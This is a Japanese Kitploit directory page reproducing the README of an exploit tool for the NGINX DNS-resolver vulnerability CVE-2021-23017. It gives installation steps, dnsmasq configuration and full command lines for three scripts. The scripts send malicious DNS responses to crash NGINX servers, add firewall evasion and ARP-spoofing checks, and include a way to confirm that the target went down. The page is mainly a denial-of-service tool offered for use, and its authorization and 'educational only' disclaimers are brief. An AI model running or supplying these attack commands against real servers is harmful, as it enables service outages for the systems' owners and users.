Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
EVIL-CVE-2021-23017-Update-2025 — NGINXサーバー(バージョン0.6.18–1.20.0)の脆弱性。これらのスクリプトは、悪意のあるDNSレスポンスを送信することでサービス妨害(DoS)を引き起こすことを目的としており、ファイアウォールを回避するための拡張機能も備えています。 | Kitploit
ツール/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテストDNS分析
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

NGINXサーバー(バージョン0.6.18–1.20.0)の脆弱性。これらのスクリプトは、悪意のあるDNSレスポンスを送信することでサービス妨害(DoS)を引き起こすことを目的としており、ファイアウォールを回避するための拡張機能も備えています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
111年前未レビュー
共有

NGINXサーバー(バージョン0.6.18~1.20.0)の脆弱性です。このスクリプトは、悪意のあるDNS応答を送信してサービス拒否(DoS)を引き起こし、ファイアウォールを回避する機能を強化したものです。これはM507/CVE-2021-23017-PoCのオリジナルPoCの改良版です。

警告: システム所有者からの明示的な書面による許可がある場合のみ使用してください。無断でのテストは違法です。

必要条件

  • 環境: Linux(例:Kali Linux、Termux/仮想環境経由)
  • 依存関係:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • ネットワーク: ARPスプーフィングのために対象と同じサブネット、または対象のNGINXがあなたのDNSサーバーIPを使用する必要があります。

インストール

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. dnsmasq をセットアップします:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    追加:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    起動:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

機能

  • 悪意のあるDNS応答を送信し、長いドメイン名(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com)を用いてNGINXサーバーをクラッシュさせます。
  • curl と dig を使用してDNSクエリをトリガーし、脆弱性を悪用します。
  • 直接DNSパケットを送信し、並列処理を使用してファイアウォールを回避します。

オリジナルとの違い

M507/CVE-2021-23017-PoCと比較して:

  • 強化されたファイアウォール回避: poc1.2.3.py で並列プロセスを使用し、スニッフィング、DNS送信、クエリトリガーを同時に行います。3つを一緒に実行する必要があります。
  • 最適化されたパケット配信: パケットとクエリの頻度を高め、ファイアウォールフィルターを回避します。
  • サブネットチェック: ARPスプーフィングのためのネットワーク互換性を確認し、信頼性を向上させます。

使い方

3つを一緒に実行し、適切な引数で実行します(<target_ip>、<your_dns_server_ip>、<target_url> を置き換えてください)。

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • DNSクエリをスニッフィングして応答します。

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • 直接DNS送信とクエリトリガーを追加します。

poc3.py(推奨)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • タスクを並列実行し、最大の効率を実現します。

例

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

結果の確認

  • サーバーのステータスを確認:

    root@kitploit:~
    curl -I http://<target_url>
    
    • 成功: 502 Bad Gateway または 503 Service Unavailable はサーバークラッシュを示します。
    • 失敗: 200 OK は脆弱性がないか、ファイアウォールにブロックされていることを示します。
  • DNSトラフィックを監視:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

免責事項: 教育目的のみに使用してください。作者は誤用に対する責任を負いません。

ツールをダウンロード